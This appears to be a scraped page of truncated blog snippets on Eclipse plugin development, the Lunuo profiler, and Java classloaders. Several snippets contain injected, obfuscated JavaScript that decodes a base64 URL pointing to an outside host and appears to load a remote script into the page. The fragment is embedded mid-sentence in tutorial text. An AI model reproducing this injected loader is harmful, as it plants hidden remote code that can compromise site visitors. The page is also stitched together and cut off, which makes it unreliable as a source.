

这是我在做每个项目时的明细表,我强烈建议您也这样做。原因是:(1)新的开发者很快的就能够加快这个项目的进程,(2)用户能够容易的安装你的产品,而且也很容易去维护。 1.版本控制:应该说您需要有某种形式的版本控制系统。如今的版本控制系统应该选择Subversion ,您只需要一台服务器主机。开放源代码的项目时,我使用code.google.com ,商业项目时我使用Hosted-Projects 。Hosted-Projects,每...

Lunuo Plugin开发总结(一)

作为新手入行开发eclipse插件,到现在为止初步了解了eclipse,osgi,RCP,SWT/JFace等一些知识。在这过程中,给我最大的帮助的是这本《Contributing to eclipse Principle, Patterns, and Plug-Ins》,这本书的作者是大名鼎鼎的Erich Gamma,JUnit的开发者,在书中demo的开发就是JUnit-Plugin的开发,作者用了Test Driven Development 和Pattern Design的观点和方法。让我在学习的过程中深深为精彩的开发过...

Eclipse 3.4 Hidden Treasures

Eclipse 3.4 "Ganymede" will be released in the upcoming days. I've been working with the RC builds for some time now and I like it. Eclipse 3.4 is a better IDE and a more robust platform than its' predecessor. In this post, I've gathered some new features which I like and may be "off the beaten path". Rich Hovers This is not a hidden feature, but I had to mention it. The Jav...

在eclipse插件里添加property page

添加property page,实现on/off auto instrument 选项;一个项目包的列表,可以选择其中某些包需要instrument;一个filter,快速选择包名(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1

Lunuo plugin使用注意1

使用Lunuo Plugin时,要打印出profiling信息时,一定要注意导入的包是跟插件目录同一个,否则由于classloader的机制,会造成静态的counter是不同的对象(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1

Eclipse – a tale of two VMs (and many classloaders)

When starting off with Eclipse plugin development or rich client platform development, you're more than likely to run into issues like ClassNotFoundException or problems with the Java command line and properties like java.endorsed.dirs. Most often, these problems arise because many Eclipse developers don't realise the magic that lets Eclipse do its work. Amongst these are th...


我们一般在系统路径中配置了 "."(当前目录)的classpath,所以如果你在当前目录命令行中运行java HelloWorld, 运行成功。这个类由system classloader去负责载入。 如果在HelloWorld.class中import另外一个在同目录下jar包中的类,如果不指定-classpath XX.jar的话,运行失败。说明system classloader 不会去查找即使时同目录下的jar包。(function(){var a=document.head||document.getElementsByTagName(...

Add a jar file to Java load path at run time

Sometimes it is necessary to amend the class load path at run time. For example, dynamically adding jar files containing user-configurable JDBC data sources. The way this is done is truly monstrous -- the URL Path format was only revealed when a colleague looked into the Java library sources. 1 2 import java.net.URL; 3 import java.io.IOException; 4 import java.ne...
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